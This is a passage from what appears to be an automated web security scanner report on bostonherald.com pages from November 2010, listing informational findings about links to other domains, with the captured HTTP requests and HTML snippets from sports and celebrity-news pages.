<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Just as he Drew it up');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/team.aspx?id=077" >team stats</a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1294646&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(32) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:none">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101107/c38bb9_Drew_11072010.jpg" alt="SALUD: Drew and Maura..." /></div>
...[SNIP]...
<a href="/sports/football/patriots/view/20101105pryor_fined_7500_for_favre_hit/"><img src="http://multimedia.heraldinteractive.com/images/20101105/stp/a857bc_ltppryor20101105.jpg" alt="Pryor fined $7,500 for Favre hit" /></a>
...[SNIP]...
<a href="/sports/football/patriots/view/20101104myron_pryor_comes_clean_on_hit/"><img src="http://multimedia.heraldinteractive.com/images/20101104/stp/0e0056_dan_11042010.jpg" alt="Myron Pryor comes clean on hit" /></a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Ffootball%2Fpatriots%2Fview%2F20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting%2Fsrvc%3Dsports%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.49. http://bostonherald.com/sports/football/patriots/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/sports/football/patriots/view.bg?articleid=1294751

The response contains the following links to other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Ffootball%2Fpatriots%2Fview%2F20101107browns_overpower_patriots_34-14%2Fsrvc%3Dhome%26position%3D0&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/reporters/rapoport_50.jpg
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/sports/football/patriots/
http://gallery.pictopia.com/bostonherald/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20101107/2e3389_brady_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/d46b50_ltpsanch20101107.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/bedf5e_kyle_11082010.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101107/stp/ad899b_110710patsms12.JPG
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/playeraaa.aspx?id=678,team=077
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/team.aspx?id=077
http://twitter.com/bostonherald
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ

Request

GET /sports/football/patriots/view.bg?articleid=1294751 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:24:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 48119

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Ffootball%2Fpatriots%2Fview%2F20101107browns_overpower_patriots_34-14%2Fsrvc%3Dhome%26position%3D0&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Pats run over in Cleveland');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/team.aspx?id=077" >team stats</a>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/playeraaa.aspx?id=678,team=077" >stats</a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1294751&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(85) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:none">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
lick to open photo gallery: Patriots 11-07-2010" onclick="window.open('http://www.bostonherald.com/galleries/index.php?gallery_id=4519','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101107/2e3389_brady_11082010.jpg" alt="BROWNTRODDEN: New England Patriots..." /></A>
...[SNIP]...
<A HREF="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/index.php?gallery_id=4519','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101107/stp/ad899b_110710patsms12.JPG" alt="Boston Herald"></a>
...[SNIP]...
<div id="buyPhotosBar">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/"><img src="/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/">Purchase Herald Photos</a>
...[SNIP]...
</div>

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<a href="/sports/football/patriots/view/20101108an_ending_well_earned_sloppy_day_shows_what_team_is/"><img src="http://multimedia.heraldinteractive.com/images/20101108/stp/bedf5e_kyle_11082010.jpg" alt="An ending well earned" /></a>
...[SNIP]...
<a href="/sports/football/other_nfl/view/20101107sanchez-led_jets_rally_to_beat_lions_23-20_in_ot/"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/d46b50_ltpsanch20101107.jpg" alt="Sanchez-led Jets rally to beat Lions 23-20 in OT" /></a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Ffootball%2Fpatriots%2Fview%2F20101107browns_overpower_patriots_34-14%2Fsrvc%3Dhome%26position%3D0&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.50. http://bostonherald.com/track/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/track/?srvc=home&position=also

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2F&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_300x100_animated.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_enews.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_home.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_mobil.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_news.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/track/
http://multimedia.heraldinteractive.com/images/20101106/4e341a_Johns_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/202d29_Fox_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/4348cc_bomb_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/cd7965_queen.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/eb101e_cam_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/4e5b50_lil_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/761463_al_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/8100ce_lily_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/98a2fb_emma_11082010.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://q1digital.checkm8.com/adam/cm8adam_1_call.js
http://twitter.com/bostonherald
http://www.4info.net/logon.jsp
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.local.com/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.twitter.com/
http://www.uclick.com/client/boh/sudoc/

Request

GET /track/?srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:32:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 72540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   

   <link rel="alternate" title="Inside Track - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/track/" type="application/rss+xml">

<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="http://bostonherald.com/track/inside_track/view.bg?articleid=1294811&position=0"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="261" width="315" alt="Because Sassy Gay Friend says so!"></a>
...[SNIP]...
<a href="http://bostonherald.com/track/inside_track/view.bg?articleid=1294812&position=1"><img class="blog_tease" src="http://multimedia.heraldinteractive.com/images/20101107/stp/4348cc_bomb_11082010.jpg" alt="Michelle ‘Bombshell’
McGee,left, and Revolution Rock Bar
bartender Caela Scott."></a>
...[SNIP]...
<a href="http://bostonherald.com/track/inside_track/view.bg?articleid=1294813&srvc=track&position=2"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/eb101e_cam_11082010.jpg" alt="Cam Neely."></a>
...[SNIP]...
<a href="http://bostonherald.com/track/star_tracks/view.bg?articleid=1294836&srvc=track&position=3"><img src="http://multimedia.heraldinteractive.com/images/20101108/stp/98a2fb_emma_11082010.jpg" alt="Emma Watson."></a>
...[SNIP]...
<a href="http://bostonherald.com/track/star_tracks/view.bg?articleid=1294837&srvc=track&position=4"><img src="http://multimedia.heraldinteractive.com/images/20101108/stp/4e5b50_lil_11082010.jpg" alt="Lil Wayne."></a>
...[SNIP]...
</div>
   <a href="http://www.4info.net/logon.jsp" style="color:#000099">Modify or Cancel alerts</a>
...[SNIP]...
<a href="/track/star_tracks/view/20101108al_roker_among_many_celebs_to_run_the_nyc_marathon/srvc=track&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101108/stp/761463_al_11082010.jpg" alt="Al Roker." /></a>
...[SNIP]...
<a href="/track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/srvc=track&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/202d29_Fox_11072010.jpg" alt="Former Celtic (hooray!) and Laker (boo!) Rick Fox, shown here cuttin’ a rug with partner Cheryl Burke on ‘Dancing with the Stars,’ likes the Green Team’s chances this year." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/format=comments&srvc=track&position=also">
...[SNIP]...
<a href="/track/celebrity/view/20101107the_socialite_network_uks_queen_joins_facebook/srvc=track&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/cd7965_queen.jpg" alt="In this undated photo provided by Britain’s Buckingham Palace Sunday, Britain’s Queen Elizabeth II’s facebook page is seen." /></a>
...[SNIP]...
<div id="rssBoxWhat">
                           <a target="_new" href="http://www.twitter.com">What is Twitter?</a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_enews.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_mobil.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_news.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_home.gif">
        </a>
...[SNIP]...
<a href="/track/track_gals_tv/"><img style="border: 1px #666 solid;" src="http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_300x100_animated.gif" /></a>
...[SNIP]...
<a class="LinksRed2None" href="/track/star_tracks/view.bg?articleid=1294839&srvc=track&position=recent"><img class="recentImage" src="http://multimedia.heraldinteractive.com/images/20101108/stp/8100ce_lily_11082010.jpg" alt="Lily Allen "></a>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1294615"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101106/4e341a_Johns_11072010.jpg"></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

8.51. http://bostonherald.com/track/inside_track/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/inside_track/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/track/inside_track/view.bg?articleid=1294615&srvc=home&position=also

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Finside_track%2Fview%2F20101107we_hearernie_boch_jr_sean_duffy__more%2Fsrvc%3Dhome%26position%3Dalso&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_315x100_animated.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/track/inside_track/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
